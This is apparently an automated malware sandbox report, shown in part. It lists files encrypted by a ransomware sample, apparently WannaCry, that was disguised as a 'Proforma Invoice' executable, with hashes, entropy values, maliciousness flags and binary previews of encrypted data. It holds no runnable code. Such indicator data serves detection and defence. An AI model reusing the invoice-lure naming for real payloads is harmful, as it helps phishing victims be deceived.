                                                          Preview:WANACRY!....N.......+..F.x.lt.C7bwA...v.YzF.&.Cwy....6.n.H.!.C....er..+{Qjj.Y+..u.&\...H..).....h..c&.6 ,6..b..S):.j.X....E<....f....7\+.!S.n.hP..xd.=,&f.>.,...Bg..E.#...W..=*...7.....tZ..x..y....';L...b...B....KR....z.M..xY$oMR...+..Mxn...:..y.\.&.A...p9.G..&.....P..........N..U...E....3c...F{..KB..`A+y'..........b.6....b. ...=.+j^...&i.e...0._.#..nG`..f....gKp..>.I.s.gEdn6.T.jT.D.y.Z....%...)..#....L.=U.$...s...*..=...V.9.X/U.Un.....9..h...u...Lg..K...|:.c......>5...>E..%...w.=.,...s.....=~.>...{dh!Ix.os.o.._B..k...0j..Y....A..F..a.;.....F.s.0X.Z.wa..Sp..d\...0$.v...d.s...Z.!....g..=,...].1U..z...h.......4I.O...@J...`..UQ.a..@.........1.Hf..4...n.z.....JR...?...z.....t...4,>(R...>%...E$ q<.v..i>c...h.k.i<..W..1y.[.r...y...k.y...d .&.L.1TY.b./.VC.0.@.. ..>}>'..Q..YV..D..'.?..x...+.J.ca............*....'9....\-d....A...f...@..B...@q.Wl6*....&7..~.aT...3..$...V!!.-.. 1!....p..v....x.....a.9...&. 3h....fX......!.Z...F.A...|....&.x~B.l..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\YfXD9vOw8__a60l-k1HNCxSbem4.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):59048
                                                          Entropy (8bit):7.996941542465184
                                                          Encrypted:true
                                                          SSDEEP:1536:UXB57fZ9ldM0iANa6BvNZ5xLU/K0PrJ1PrfystCr:URpfHM0iANF9xGJ17ysM
                                                          MD5:624018D89B8CB9165FD776F227C144E6
                                                          SHA1:2941055FD2F6C08BD7ADFBBF7E53C97C6D9D747C
                                                          SHA-256:145F3B4FDB5DC4E2ED349A93B4BB26784682DCEDA560EA13ECD510AF93A311CC
                                                          SHA-512:24853A0C390783FF2A2118532D88031082497DBC099C06E3E35ADD20C1AA08F500BAD9DB743BAE332638FEA0C68B0BBCEC8B39AD208F21206D3660C9C1DC92E4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......5.B....<.....O.h...{b.D.'...]6.......\...U>...&..A..[."...r&...".D^#B...L|;.8.J..v=E..:.K.S..a..zP...u....:.~.,'.;O...p:...me....]`....m..."..3WB........v .z.Z.a.....c$gXm@../...f...~.Z....!...rG.....M.X....."$=......h.....Ug`.>..p......!..>+^..............G....f.m....5.p..+'r3.!.....S....................|{....y........v1.YIP'...B......@.[..C.U..P.,u..jw~b...N.4....hLd/..^ ...EmN.ui../..O..DSo#....Yp....s..7_T....U`.f....d....nM.=....0U.`..E1.t.=T..9.,..RLwa..I...Q...\./.Kd..S.@.....]..\@......<B>.O.h.?.F&.R0HKS#l..,p;..ll..8../lA.T............'\.a..vG.s..b'.^.L.........xb...,...e...Y.u.bO..]......7..)a..{.I.....='..w.v.......7.3......Z...iV._..6}E.{.7....%....d...X.]..y..a...yo...<B=6a...d.3.W.S2...~...).........Pv.....xHg.$.%-y........}..o.u.V.y..k,.._...!.B'ts..rH_.*...-x.g......$.I..:....c.z.(.1ewD{c.$8.-./?.C5..tM.....f...ox.g......(.......4....k.....&{9......3.....BL.62b...._.o.. ........,o...rJ.I.X..13....J....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\YfXD9vOw8__a60l-k1HNCxSbem4.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):59048
                                                          Entropy (8bit):7.996941542465184
                                                          Encrypted:true
                                                          SSDEEP:1536:UXB57fZ9ldM0iANa6BvNZ5xLU/K0PrJ1PrfystCr:URpfHM0iANF9xGJ17ysM
                                                          MD5:624018D89B8CB9165FD776F227C144E6
                                                          SHA1:2941055FD2F6C08BD7ADFBBF7E53C97C6D9D747C
                                                          SHA-256:145F3B4FDB5DC4E2ED349A93B4BB26784682DCEDA560EA13ECD510AF93A311CC
                                                          SHA-512:24853A0C390783FF2A2118532D88031082497DBC099C06E3E35ADD20C1AA08F500BAD9DB743BAE332638FEA0C68B0BBCEC8B39AD208F21206D3660C9C1DC92E4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......5.B....<.....O.h...{b.D.'...]6.......\...U>...&..A..[."...r&...".D^#B...L|;.8.J..v=E..:.K.S..a..zP...u....:.~.,'.;O...p:...me....]`....m..."..3WB........v .z.Z.a.....c$gXm@../...f...~.Z....!...rG.....M.X....."$=......h.....Ug`.>..p......!..>+^..............G....f.m....5.p..+'r3.!.....S....................|{....y........v1.YIP'...B......@.[..C.U..P.,u..jw~b...N.4....hLd/..^ ...EmN.ui../..O..DSo#....Yp....s..7_T....U`.f....d....nM.=....0U.`..E1.t.=T..9.,..RLwa..I...Q...\./.Kd..S.@.....]..\@......<B>.O.h.?.F&.R0HKS#l..,p;..ll..8../lA.T............'\.a..vG.s..b'.^.L.........xb...,...e...Y.u.bO..]......7..)a..{.I.....='..w.v.......7.3......Z...iV._..6}E.{.7....%....d...X.]..y..a...yo...<B=6a...d.3.W.S2...~...).........Pv.....xHg.$.%-y........}..o.u.V.y..k,.._...!.B'ts..rH_.*...-x.g......$.I..:....c.z.(.1ewD{c.$8.-./?.C5..tM.....f...ox.g......(.......4....k.....&{9......3.....BL.62b...._.o.. ........,o...rJ.I.X..13....J....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):121496
                                                          Entropy (8bit):7.998607095087082
                                                          Encrypted:true
                                                          SSDEEP:1536:LqWLuHlE4GjI9EjYNdKK9OllWsx4aJSSnLvslrI4I8UzAn+raVPMpLFd7PzHi2Ib:jAE4Gjszp9QYabYBrI2+iMN3Hi2IrskD
                                                          MD5:9C6F089439AAC6E186FEC6354CF41979
                                                          SHA1:B94E79B551D1FE64464D87E4BDE4C310C270BE90
                                                          SHA-256:C617D07FB8DD3C2C88C8A7C47369A89A7F472196C4F9D590F6DCAC0B1F219C1E
                                                          SHA-512:CFCA4C62F7C2D7350B1E8B97F9B4EDB1EEC54050EDBD29CD7546D23E468095B67F877D3F653025F7B3957AF5A85DA20668ED5089EACC92AEC0EAAE7F20EDC98B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......&.D...........''...~....>..[Z.I&.+M..W.c.M..Q..E"..f7.\.?.t..n.K..xQ...h..^l....q{yD.2-..hM......6..o....i8)...C.f.....d..].......z.EY.i.s.p.4..A..Wn.G......J,.n.{)!X.xB0.t.kI..i.,I.0k..i.Ap...N=.X.Yh.i...t.h...+.@.Q....K....b.>4..ijA6..9|....~.........yW/Q~:\_..C..N....*....z6.."........Z)3..X.[n`,B.*.!M.D..{...^...L..x.o{..]..%.]s.>......r.m...1k.........~.aQ....dr;...xx..........W......k..[.^..j.c#ju...`y....z.....m...-...+*&.r.=.lNH..m||..8>&..........B...,..Q.~....ns...T...MC.DL....I.Ur.]urv/g...W..!......#....XL.S%..A5d.<.N!..e..........A.........Fm..Gx.r.Y.-~..:.:..O..._.).....f1.V.}.}xd6:.......n..Sav....mg&.<....O<..U.[.tc..[..p...L..;`~.swY4_....W...Q..J...)..|.......Z&Y.....5/.lc...OH.|.h....`W"........Q....B.7...\...z&.....3Qd..y.}.l.....Ky,L...a2...;...S.P.+b..u..".......g{).....t6\....s..5[..h{..s..h5x.P._.....:....p.Y...".?..Fz..H..rmZ|cp..|...#..o..f......[...C........,..a/...|(....s...k.c.D).u..>.m..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):121496
                                                          Entropy (8bit):7.998607095087082
                                                          Encrypted:true
                                                          SSDEEP:1536:LqWLuHlE4GjI9EjYNdKK9OllWsx4aJSSnLvslrI4I8UzAn+raVPMpLFd7PzHi2Ib:jAE4Gjszp9QYabYBrI2+iMN3Hi2IrskD
                                                          MD5:9C6F089439AAC6E186FEC6354CF41979
                                                          SHA1:B94E79B551D1FE64464D87E4BDE4C310C270BE90
                                                          SHA-256:C617D07FB8DD3C2C88C8A7C47369A89A7F472196C4F9D590F6DCAC0B1F219C1E
                                                          SHA-512:CFCA4C62F7C2D7350B1E8B97F9B4EDB1EEC54050EDBD29CD7546D23E468095B67F877D3F653025F7B3957AF5A85DA20668ED5089EACC92AEC0EAAE7F20EDC98B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......&.D...........''...~....>..[Z.I&.+M..W.c.M..Q..E"..f7.\.?.t..n.K..xQ...h..^l....q{yD.2-..hM......6..o....i8)...C.f.....d..].......z.EY.i.s.p.4..A..Wn.G......J,.n.{)!X.xB0.t.kI..i.,I.0k..i.Ap...N=.X.Yh.i...t.h...+.@.Q....K....b.>4..ijA6..9|....~.........yW/Q~:\_..C..N....*....z6.."........Z)3..X.[n`,B.*.!M.D..{...^...L..x.o{..]..%.]s.>......r.m...1k.........~.aQ....dr;...xx..........W......k..[.^..j.c#ju...`y....z.....m...-...+*&.r.=.lNH..m||..8>&..........B...,..Q.~....ns...T...MC.DL....I.Ur.]urv/g...W..!......#....XL.S%..A5d.<.N!..e..........A.........Fm..Gx.r.Y.-~..:.:..O..._.).....f1.V.}.}xd6:.......n..Sav....mg&.<....O<..U.[.tc..[..p...L..;`~.swY4_....W...Q..J...)..|.......Z&Y.....5/.lc...OH.|.h....`W"........Q....B.7...\...z&.....3Qd..y.}.l.....Ky,L...a2...;...S.P.+b..u..".......g{).....t6\....s..5[..h{..s..h5x.P._.....:....p.Y...".?..Fz..H..rmZ|cp..|...#..o..f......[...C........,..a/...|(....s...k.c.D).u..>.m..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\axXWui3EcbJQ5EbqyMZWmTud9p8.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4024
                                                          Entropy (8bit):7.953319780057477
                                                          Encrypted:false
                                                          SSDEEP:96:oJEdWZZVUvTdoVMbFbSLCnHVT18DEZWuaT:J6ZVeTSVaYi1T2IZA
                                                          MD5:91EC16DAFCAAB89A8264E96BE533AB44
                                                          SHA1:AAD188344DC4CEABF23B0A54265397E2980D5815
                                                          SHA-256:BE79FBCA8FD9702F104E0B8D297EA06182A3D409A14317577C001EDCB2CA3B79
                                                          SHA-512:15CA4DE1271601156305EEFAB270EECC85F679660697E9323DF64A98D5109610848C1AB49E87CD1AA1D35AE20EB425EBC4583FF7269B318A2F047F563025FA77
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....?a..GW..N..T#.!...h.}.)^c..!.y..p.<6.0..)o........[...6.4<..=..p..j............NB.G...M8.....q<S-.......s.g...."[....Y..!5b*...VD.su..4r..\...].X*.....Z.q\]~..|..=> ...%...~....F.Hj5...+.t.[....q...\.z.....hj.d...YU...gq..>..y.O......s.K....b.............t?...1....&..,...S.\..d`L...P...0....xj.....z..r_..!p...9A....A...B..^oKUB.B......=.d.i.i.....=y.X......vq.>...!.....e.b5..r$..Xg...F.h.$...+p]n`. $<gi..IZ..B1..hr..H...W..j..7.n.......3KA1~....5.z.&........0......k..Z..7.#"@K.v.P.....T6...U.47.....3T_T....n....%..q(..M..'..F2i.+t(.si...W..m..Zt..l..Fz#.E....W.cJ.t..S#lLWo..1.W-...y.w.f.lsdQa.`(...Jq..!.]zA...N....+x..,F...,..Bf..5<nC4....q.I.Z7.Fc.l.....A...kE......F...V....5.._.C.eA.3pf.4.. .0.....-....t.78r..YN..U......F.6cO%..U/.]....|.&./{........ZDP......{...g*a.1]..9.V...W.y..S..=y..[...fg3...gh..2f.^.B1j.........Jf.S.;...v.Y.N....I.#.E....'.Ws..-.....g..Xy8..r=........j..C...kI.#......e.4......l.<.....M)~Jq..2._.m.i.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\axXWui3EcbJQ5EbqyMZWmTud9p8.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4024
                                                          Entropy (8bit):7.953319780057477
                                                          Encrypted:false
                                                          SSDEEP:96:oJEdWZZVUvTdoVMbFbSLCnHVT18DEZWuaT:J6ZVeTSVaYi1T2IZA
                                                          MD5:91EC16DAFCAAB89A8264E96BE533AB44
                                                          SHA1:AAD188344DC4CEABF23B0A54265397E2980D5815
                                                          SHA-256:BE79FBCA8FD9702F104E0B8D297EA06182A3D409A14317577C001EDCB2CA3B79
                                                          SHA-512:15CA4DE1271601156305EEFAB270EECC85F679660697E9323DF64A98D5109610848C1AB49E87CD1AA1D35AE20EB425EBC4583FF7269B318A2F047F563025FA77
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....?a..GW..N..T#.!...h.}.)^c..!.y..p.<6.0..)o........[...6.4<..=..p..j............NB.G...M8.....q<S-.......s.g...."[....Y..!5b*...VD.su..4r..\...].X*.....Z.q\]~..|..=> ...%...~....F.Hj5...+.t.[....q...\.z.....hj.d...YU...gq..>..y.O......s.K....b.............t?...1....&..,...S.\..d`L...P...0....xj.....z..r_..!p...9A....A...B..^oKUB.B......=.d.i.i.....=y.X......vq.>...!.....e.b5..r$..Xg...F.h.$...+p]n`. $<gi..IZ..B1..hr..H...W..j..7.n.......3KA1~....5.z.&........0......k..Z..7.#"@K.v.P.....T6...U.47.....3T_T....n....%..q(..M..'..F2i.+t(.si...W..m..Zt..l..Fz#.E....W.cJ.t..S#lLWo..1.W-...y.w.f.lsdQa.`(...Jq..!.]zA...N....+x..,F...,..Bf..5<nC4....q.I.Z7.Fc.l.....A...kE......F...V....5.._.C.eA.3pf.4.. .0.....-....t.78r..YN..U......F.6cO%..U/.]....|.&./{........ZDP......{...g*a.1]..9.V...W.y..S..=y..[...fg3...gh..2f.^.B1j.........Jf.S.;...v.Y.N....I.#.E....'.Ws..-.....g..Xy8..r=........j..C...kI.#......e.4......l.<.....M)~Jq..2._.m.i.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\dMxp0YQLz5hOQviuFXI5GuahQMU.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):172632
                                                          Entropy (8bit):7.998903407774883
                                                          Encrypted:true
                                                          SSDEEP:3072:D6DlWNDj4cn/0C77dlIBqvjM5JxIR7iBPG/XXvMKIqdzHfvAn4:D6DlGQspdlIhnNBSnvMLqFHgn4
                                                          MD5:6C519C5D90E85F5A89D6D57F8D67B9CE
                                                          SHA1:4F0E425738106F97C3517B2225A13346084877AF
                                                          SHA-256:1B30F8DC19176630B0EFE11F03F8EBDA0CFFD607A5B4877E734D73701E4A3B54
                                                          SHA-512:192B87EF3CB4D78B7C5F608FAD3907188681D73A8C93F97460AA9C418B5FF98C238E1CA8C78FE90ED0D91711358E073F383016255454A92C70A716DFFD188A79
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........|`z..O....I..9..D.,..F`].l.W7}.g....Q)...P...TBvhvP./.J.$X1..y9.~....."".R.......QZ0..F}hXJ.^../.....|...r.!.90...s...pR..."......D.>.M.yf...A.hvR.Y..a.7..C.Tf......T...#..mR.y....k........(0.P....8e..j.}c.....#........|~....<...m.......v....5........P.,........L.>...=..p.!y..$t(.V..o.b.7.VI!..MGl..=.69.v..|..#.._.I(...1xK..p.......C..SV7H...K.3A}.C...W.V..$.....j.d....H;....O....Q....E.Y.!.OL7.3.S....+.._x...g}...Ul.0.TE.U.>....(4(m..$o....c.#.'A?PH...$.S.x..B.......e-. ..7fg.Y....L._e...P..w|..,..JR.l...3b.KD....Q.!~......}..7..P.Dx.....X../....Y...d..U.....|]....H....ah..p..].$.[..w$.t..$.X.9.J.....M..&.3:d|...+...../....K.NwE.Y.8.;!.[.@..$...]D.9~}:..oUvo..L..)7...:...9=...I...Z....$....}.Hx.g}.=.1.y........;.5.K.a........e..;t\...$.%..:.!...!.c$......:-.....;V.C6....v3.OSx/..u..2..u...w..Y/....R..(....Q.R.yZC....et.I-..L..9._...t.zv.M.y.Z.-h[.5D;...wp..4w..R....@.&.?. ;....F}.A9.o..k../...}.l...S.T,yf.^.h..Y%..Y[.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\dMxp0YQLz5hOQviuFXI5GuahQMU.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):172632
                                                          Entropy (8bit):7.998903407774883
                                                          Encrypted:true
                                                          SSDEEP:3072:D6DlWNDj4cn/0C77dlIBqvjM5JxIR7iBPG/XXvMKIqdzHfvAn4:D6DlGQspdlIhnNBSnvMLqFHgn4
                                                          MD5:6C519C5D90E85F5A89D6D57F8D67B9CE
                                                          SHA1:4F0E425738106F97C3517B2225A13346084877AF
                                                          SHA-256:1B30F8DC19176630B0EFE11F03F8EBDA0CFFD607A5B4877E734D73701E4A3B54
                                                          SHA-512:192B87EF3CB4D78B7C5F608FAD3907188681D73A8C93F97460AA9C418B5FF98C238E1CA8C78FE90ED0D91711358E073F383016255454A92C70A716DFFD188A79
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........|`z..O....I..9..D.,..F`].l.W7}.g....Q)...P...TBvhvP./.J.$X1..y9.~....."".R.......QZ0..F}hXJ.^../.....|...r.!.90...s...pR..."......D.>.M.yf...A.hvR.Y..a.7..C.Tf......T...#..mR.y....k........(0.P....8e..j.}c.....#........|~....<...m.......v....5........P.,........L.>...=..p.!y..$t(.V..o.b.7.VI!..MGl..=.69.v..|..#.._.I(...1xK..p.......C..SV7H...K.3A}.C...W.V..$.....j.d....H;....O....Q....E.Y.!.OL7.3.S....+.._x...g}...Ul.0.TE.U.>....(4(m..$o....c.#.'A?PH...$.S.x..B.......e-. ..7fg.Y....L._e...P..w|..,..JR.l...3b.KD....Q.!~......}..7..P.Dx.....X../....Y...d..U.....|]....H....ah..p..].$.[..w$.t..$.X.9.J.....M..&.3:d|...+...../....K.NwE.Y.8.;!.[.@..$...]D.9~}:..oUvo..L..)7...:...9=...I...Z....$....}.Hx.g}.=.1.y........;.5.K.a........e..;t\...$.%..:.!...!.c$......:-.....;V.C6....v3.OSx/..u..2..u...w..Y/....R..(....Q.R.yZC....et.I-..L..9._...t.zv.M.y.Z.-h[.5D;...wp..4w..R....@.&.?. ;....F}.A9.o..k../...}.l...S.T,yf.^.h..Y%..Y[.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\h0_ymK9wPEJMicnVALPw5taHcNA.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):7.917347266612112
                                                          Encrypted:false
                                                          SSDEEP:48:bkHYyrT1GogYtvdcT/eBV7qKb2tq4cqjL3ZYEWLsRii9K53zT7:op3yi2LXKAtYEW3/f
                                                          MD5:9C5DFA7DA78405898A443C082A43AE20
                                                          SHA1:71BC3580760F5C9921D4FD535A2B7B70AC2F50FA
                                                          SHA-256:D2C5ACF245699BCD767EA29DC5A18E0EC63D61E4BED3524F4678CBAF83A4A690
                                                          SHA-512:C71D69B3582E38E3A6232FBDF2B072C156D6584D1C120CC1B2B13C6FE29F9FEBF5DDA92F1186B3A759EADAFD992CECAFF033A31368DB044311FBE6EA668A58D6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......3.=..e.O..W...P.....G....A.B...@1..r.p....P!......,.Z...3t.@...9...*..g.vi..2......\......U.J).K.v. $.....-...H-R....B..M......to...v5.r.Y....u..@@...4.,L0...;.O..v>.....X|;./p.j..,}..AQK......@.B........d..10.......J......n>.&[@v.k......b.......,.T.m..1y.{..A.qN."....@....vE.........[....%.m.lk..O.]{......0H.."A1.w....<..q....V..eC;.#.......2...Z8RX..>.._.v.....Z6I.4...8.E#...../.7.h;.&z.iUB.,.7....t..6..y.....W......KR...,M ..g`e.V.~..K.....?.x.hu&5.qE.G].E.G..o[....kD.6.5.k...v....).<..,7:.P.]...g0A^.7..C'....'..A....../...U=...."FQ.Y.8.S...<v...bm.\i.%..~Jd.>.1...u...._..oopDO.+..o5...../.Q.%..-:Ha.%..>.=X>E."...^.....!97...^.wG...pH/2N$..g....}H?I6G..3.......%.dd.cA.x......._/.......e?<}.^.=..^Ts.t.Q4.....2\...3T....).=J.Md..C...~.....G...p..(.Z$..H....9Sp_[9.C.y>.pK.o..0.yaG1..0....E.z.....?.U.Vk.........C..M....,rS.BY...{.e.O.;I....^.ID.....3k..O`..B../t.._@..7......vS...?.|(.D.Kw..a{T.dHEF...........t

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\h0_ymK9wPEJMicnVALPw5taHcNA.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):7.917347266612112
                                                          Encrypted:false
                                                          SSDEEP:48:bkHYyrT1GogYtvdcT/eBV7qKb2tq4cqjL3ZYEWLsRii9K53zT7:op3yi2LXKAtYEW3/f
                                                          MD5:9C5DFA7DA78405898A443C082A43AE20
                                                          SHA1:71BC3580760F5C9921D4FD535A2B7B70AC2F50FA
                                                          SHA-256:D2C5ACF245699BCD767EA29DC5A18E0EC63D61E4BED3524F4678CBAF83A4A690
                                                          SHA-512:C71D69B3582E38E3A6232FBDF2B072C156D6584D1C120CC1B2B13C6FE29F9FEBF5DDA92F1186B3A759EADAFD992CECAFF033A31368DB044311FBE6EA668A58D6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......3.=..e.O..W...P.....G....A.B...@1..r.p....P!......,.Z...3t.@...9...*..g.vi..2......\......U.J).K.v. $.....-...H-R....B..M......to...v5.r.Y....u..@@...4.,L0...;.O..v>.....X|;./p.j..,}..AQK......@.B........d..10.......J......n>.&[@v.k......b.......,.T.m..1y.{..A.qN."....@....vE.........[....%.m.lk..O.]{......0H.."A1.w....<..q....V..eC;.#.......2...Z8RX..>.._.v.....Z6I.4...8.E#...../.7.h;.&z.iUB.,.7....t..6..y.....W......KR...,M ..g`e.V.~..K.....?.x.hu&5.qE.G].E.G..o[....kD.6.5.k...v....).<..,7:.P.]...g0A^.7..C'....'..A....../...U=...."FQ.Y.8.S...<v...bm.\i.%..~Jd.>.1...u...._..oopDO.+..o5...../.Q.%..-:Ha.%..>.=X>E."...^.....!97...^.wG...pH/2N$..g....}H?I6G..3.......%.dd.cA.x......._/.......e?<}.^.=..^Ts.t.Q4.....2\...3T....).=J.Md..C...~.....G...p..(.Z$..H....9Sp_[9.C.y>.pK.o..0.yaG1..0....E.z.....?.U.Vk.........C..M....,rS.BY...{.e.O.;I....^.ID.....3k..O`..B../t.._@..7......vS...?.|(.D.Kw..a{T.dHEF...........t

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\j5xZRlJccnLYwHvUyxqh_abmeEE.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14648
                                                          Entropy (8bit):7.987260585808005
                                                          Encrypted:false
                                                          SSDEEP:384:Xcy04zPGYSQ36DiCTJznKc3V4rlzU6lrM56BMt:YVYSQKDtKc3OrlzU6lg5sC
                                                          MD5:19DD64CC486640FA7522D3ECA9B269B1
                                                          SHA1:4E5456517C129793EB3DC392317CA2CD90047501
                                                          SHA-256:09D80F7E0C2334EA564209F7D5401992B64BFE4D77A69F061FB7B35018E366DD
                                                          SHA-512:B9EA43D7D346EF83BF938BD6D24AEBAA29FCF4D8B7647922645A19CC9400353402C2C6BF375B3CCA1D97940A0D0FB217F39B1C9F85EF7488A8AA75A8AB5E0FEC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......L..%............/M..d.'h|a....:n'.p..I..~..0..Q.181...*........$.V.!.&>.4>...b.\.-C1.D... ....4.cz.m...n.G^..3.M...!.Y9....Q....KF..Nc..A.:.w...i7,.#.t..lm.....KlI3..K.7...?GH%.p.%........0L...q.4....o.L..N...I.<.O..0Z}...~u......g.).(/.....8......?..(.FX5J...M.^U...9A....^..4......l_..Ogt....G.......+...Mv..m..f.HxE9.....+....?.T.(..V_.g..\........w......_.i....[p...6..|....NK.H0....M.uI.....H^..-.X(4.....wU.I.,.P."6K..McG/8Z.E.V.jW.4g...Wq*.L.7r.o<p...t`.v+.y.~.....V.?..=\c._.P.."Z../..O.....s..BW....|....C.H.c..CR......3n..ph..}.)Lv a.o:.....-U...Y..k|.4hj_.P.!.C.......*@$..?H.K.|]..I3c>.L.q_..x.6..f[e_A..T..........`.N..QZg......L.FW....t)......O.(..Q....#.o.u....9.../..7S......He).%.......1....._.+...hMf.S).$g.. ..6.LJ..j...0X.L.).......A....A.|..F..L...K....B..t.._.....j...J.[/.........$.~.....K.....M..eswv.C..;%....b2f..*3..L....I)....F.kZ....E^.1.2O..%..D.i.Q3.|..[t.../....{...Z.[2..eT.....S..)...6R.2

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\j5xZRlJccnLYwHvUyxqh_abmeEE.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14648
                                                          Entropy (8bit):7.987260585808005
                                                          Encrypted:false
                                                          SSDEEP:384:Xcy04zPGYSQ36DiCTJznKc3V4rlzU6lrM56BMt:YVYSQKDtKc3OrlzU6lg5sC
                                                          MD5:19DD64CC486640FA7522D3ECA9B269B1
                                                          SHA1:4E5456517C129793EB3DC392317CA2CD90047501
                                                          SHA-256:09D80F7E0C2334EA564209F7D5401992B64BFE4D77A69F061FB7B35018E366DD
                                                          SHA-512:B9EA43D7D346EF83BF938BD6D24AEBAA29FCF4D8B7647922645A19CC9400353402C2C6BF375B3CCA1D97940A0D0FB217F39B1C9F85EF7488A8AA75A8AB5E0FEC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......L..%............/M..d.'h|a....:n'.p..I..~..0..Q.181...*........$.V.!.&>.4>...b.\.-C1.D... ....4.cz.m...n.G^..3.M...!.Y9....Q....KF..Nc..A.:.w...i7,.#.t..lm.....KlI3..K.7...?GH%.p.%........0L...q.4....o.L..N...I.<.O..0Z}...~u......g.).(/.....8......?..(.FX5J...M.^U...9A....^..4......l_..Ogt....G.......+...Mv..m..f.HxE9.....+....?.T.(..V_.g..\........w......_.i....[p...6..|....NK.H0....M.uI.....H^..-.X(4.....wU.I.,.P."6K..McG/8Z.E.V.jW.4g...Wq*.L.7r.o<p...t`.v+.y.~.....V.?..=\c._.P.."Z../..O.....s..BW....|....C.H.c..CR......3n..ph..}.)Lv a.o:.....-U...Y..k|.4hj_.P.!.C.......*@$..?H.K.|]..I3c>.L.q_..x.6..f[e_A..T..........`.N..QZg......L.FW....t)......O.(..Q....#.o.u....9.../..7S......He).%.......1....._.+...hMf.S).$g.. ..6.LJ..j...0X.L.).......A....A.|..F..L...K....B..t.._.....j...J.[/.........$.~.....K.....M..eswv.C..;%....b2f..*3..L....I)....F.kZ....E^.1.2O..%..D.i.Q3.|..[t.../....{...Z.[2..eT.....S..)...6R.2

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\l1NajuxeuQ3qDy6uCL1VS6rO4Lw.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
